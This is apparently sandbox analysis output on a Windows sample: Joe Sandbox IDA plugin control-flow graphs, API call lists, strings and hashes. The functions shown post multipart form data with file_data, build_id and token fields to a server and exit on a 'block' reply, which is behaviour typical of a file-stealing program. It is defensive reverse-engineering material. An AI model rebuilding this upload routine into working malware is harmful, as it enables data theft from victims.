                                                                                                                                                                                                                                                                                control_flow_graph 1548 403090-40317c call 4101c0 call 410200 call 402790 call 4116b0 call 410530 lstrlenA call 410530 call 4116b0 call 4101c0 * 4 StrCmpCA 1571 4031ab-403298 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 4102e0 call 410340 call 410290 call 410230 * 3 call 410340 call 4102e0 call 410290 call 410230 * 2 InternetConnectA 1548->1571 1572 40317e-4031a5 call 410530 InternetOpenA 1548->1572 1577 40386c-4038ae call 411250 * 2 call 4104e0 * 4 call 410200 1571->1577 1642 40329e-4032d5 HttpOpenRequestA 1571->1642 1572->1571 1572->1577 1607 4038c0-403913 call 410230 * 9 1577->1607 1644 403865-403866 InternetCloseHandle 1642->1644 1645 4032db-4032e6 1642->1645 1644->1577 1646 403300-403718 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 401390 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410530 lstrlenA call 410530 lstrlenA GetProcessHeap RtlAllocateHeap call 410530 * 2 lstrlenA memcpy call 410530 lstrlenA memcpy call 410530 lstrlenA call 410530 * 2 lstrlenA memcpy 1645->1646 1647 4032e8-4032fa InternetSetOptionA 1645->1647 1846 403720-403754 call 410530 lstrlenA call 410530 HttpSendRequestA 1646->1846 1647->1646 1851 403780-4037ac call 411250 HttpQueryInfoA 1846->1851 1852 403756-403769 Sleep 1846->1852 1859 4038b0-4038bd call 4101c0 1851->1859 1860 4037b2-4037bd call 411220 1851->1860 1853 403770-40377b call 411250 1852->1853 1854 40376b-40376e 1852->1854 1853->1859 1854->1846 1854->1853 1859->1607 1860->1859 1865 4037c3-4037de InternetReadFile 1860->1865 1866 4037e0-4037e5 1865->1866 1867 403834-40384c call 410530 StrCmpCA 1865->1867 1866->1867 1868 4037e7-4037ea 1866->1868 1873 403856-403862 InternetCloseHandle 1867->1873 1874 40384e-403850 ExitProcess 1867->1874 1870 4037f0-40382b call 410340 call 410290 call 410230 InternetReadFile 1868->1870 1870->1867 1880 40382d-403832 1870->1880 1873->1644 1880->1867 1880->1870
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                • InternetConnectA.WININET ref: 00403290
                                                                                                                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 004032CA
                                                                                                                                                                                                                                                                                • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 004032FA
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,?,Content-Disposition: form-data; name=",?,?,00421505,?,?,?), ref: 0040364A
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00403660
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040366C
                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00403679
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040369B
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00411952,00000000), ref: 004036A2
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000014), ref: 004036BC
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,00000014), ref: 004036C7
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 004036E1
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403703
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403708
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403739
                                                                                                                                                                                                                                                                                • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040374F
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 0040375D
                                                                                                                                                                                                                                                                                • HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 004037A4
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 004037D6
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000007CF,?), ref: 00403823
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,block,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403848
                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403850
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00403859
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00403866
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrlen$Internet$Heap$lstrcpy$Process$Httpmemcpy$AllocateBinaryCloseCryptFileHandleOpenReadRequestStringlstrcat$ConnectCrackErrorExitFreeInfoLastOptionQuerySendSleep
                                                                                                                                                                                                                                                                                • String ID: ------$"$--$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$block$build_id$file_data$file_name$https$token
                                                                                                                                                                                                                                                                                • API String ID: 1851392271-2620489619
                                                                                                                                                                                                                                                                                • Opcode ID: 4b79130a0f4ea3545f79df70e1b297391bfff2f976d9b237d9fafe9a9eb16a72
                                                                                                                                                                                                                                                                                • Instruction ID: bceff4d112c07ef55503c2bfa5bbc07c75ab0ef13ec91c0f48555253a5be1088
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b79130a0f4ea3545f79df70e1b297391bfff2f976d9b237d9fafe9a9eb16a72
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A2263307105286BDB05BBA19C96AFF67699F84748F40006EF4066B281DFBC5EC687ED
                                                                                                                                                                                                                                                                                Function 00403920 Relevance: 72.4, APIs: 30, Strings: 11, Instructions: 633networkmemorystringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 1881 403920-4039d0 call 410200 call 402790 call 4101c0 * 5 call 410530 InternetOpenA StrCmpCA 1898 404010-404031 InternetCloseHandle call 410530 call 407790 1881->1898 1899 4039d6-403b13 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 4102e0 call 410290 call 410230 * 2 InternetConnectA 1881->1899 1909 404081-404098 call 411250 * 2 call 410200 1898->1909 1910 404033-40407e call 410240 call 410340 call 410290 call 410230 GetProcessHeap HeapFree 1898->1910 1899->1898 1990 403b19-403b56 HttpOpenRequestA 1899->1990 1926 40409d-4040f6 call 410230 * 10 1909->1926 1910->1909 1991 404006-40400d InternetCloseHandle 1990->1991 1992 403b5c-403b61 1990->1992 1991->1898 1993 403b63-403b75 InternetSetOptionA 1992->1993 1994 403b7b-403e45 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 401390 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410530 lstrlenA call 410530 lstrlenA GetProcessHeap HeapAlloc 1992->1994 1993->1994 2139 403f35-403f5d InternetCloseHandle * 3 call 4101c0 1994->2139 2140 403e4b-403eb3 call 410530 * 2 lstrlenA memcpy call 410530 lstrlenA call 410530 * 2 lstrlenA memcpy 1994->2140 2139->1926 2153 403ec0-403ef4 call 410530 lstrlenA call 410530 2140->2153 2159 403f62-403f7e call 411250 GetProcessHeap HeapFree 2153->2159 2160 403ef6-403f09 Sleep 2153->2160 2166 403f80-403f9b InternetReadFile 2159->2166 2162 403f10-403f33 call 411250 GetProcessHeap HeapFree 2160->2162 2163 403f0b-403f0e 2160->2163 2162->2139 2162->2166 2163->2153 2163->2162 2168 403ff7-404003 InternetCloseHandle 2166->2168 2169 403f9d-403fa2 2166->2169 2168->1991 2169->2168 2170 403fa4-403fa7 2169->2170 2171 403fb0-403fee call 410340 call 410290 call 410230 InternetReadFile 2170->2171 2171->2168 2178 403ff0-403ff5 2171->2178 2178->2168 2178->2171
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                • InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                • InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,",?,?,mode,?,?,Content-Disposition: form-data; name=",?,?,00421505), ref: 00403E15
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00403E28
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00403E34
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403E41
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00403E66
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00403E6B
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403E82
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA4
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA9
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403ED9
                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403EFD
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F22
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F2C
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00403F38
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00403F41
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00417786), ref: 00403F4A
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F74
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F7E
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000000C7,?), ref: 00403F93
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,000000C7,?), ref: 00403FE6
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00403FFA
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404007
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404011
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,0042150A,00000000,?,?,?,?,?,?,?), ref: 0040406D
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040407C
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internet$lstrlen$Heap$CloseHandle$lstrcpy$Process$Free$FileOpenReadlstrcatmemcpy$AllocConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$mode$token
                                                                                                                                                                                                                                                                                • API String ID: 2829941862-3466435155
                                                                                                                                                                                                                                                                                • Opcode ID: 861cb8dae58485ddebc8c38636aeaaa6a9d7a4680efb3a25b371246ffcd3b1fe
                                                                                                                                                                                                                                                                                • Instruction ID: 5b37cdde6ef0ecb750ac5b7d415ead0f9e62264991208947704b3bc77561ae75
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 861cb8dae58485ddebc8c38636aeaaa6a9d7a4680efb3a25b371246ffcd3b1fe
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1312523171011867CB15BBA29C9AAFF6B6A9FC4704F40005EF4066B291DFBC5DC6C7A9
                                                                                                                                                                                                                                                                                Function 00418610 Relevance: 70.2, APIs: 6, Strings: 34, Instructions: 150libraryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 2179 418610-418622 GetModuleHandleA 2180 4187e6-41883e LoadLibraryA * 5 2179->2180 2181 418628-4187e1 call 404df0 * 21 2179->2181 2182 418840-418850 call 404df0 2180->2182 2183 418855-418857 2180->2183 2181->2180 2182->2183 2186 418859-418879 call 404df0 * 2 2183->2186 2187 41887e-418885 2183->2187 2186->2187 2189 418897-41889e 2187->2189 2190 418887-418892 call 404df0 2187->2190 2195 4188b0-4188b7 2189->2195 2196 4188a0-4188ab call 404df0 2189->2196 2190->2189 2202 4188b9-4188d9 call 404df0 * 2 2195->2202 2203 4188de 2195->2203 2196->2195 2202->2203
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,004185CA), ref: 00418615
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ntdll.dll), ref: 004187EB
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004187FB
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(user32.dll), ref: 0041880B
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(crypt32.dll), ref: 0041881B
                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041882B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
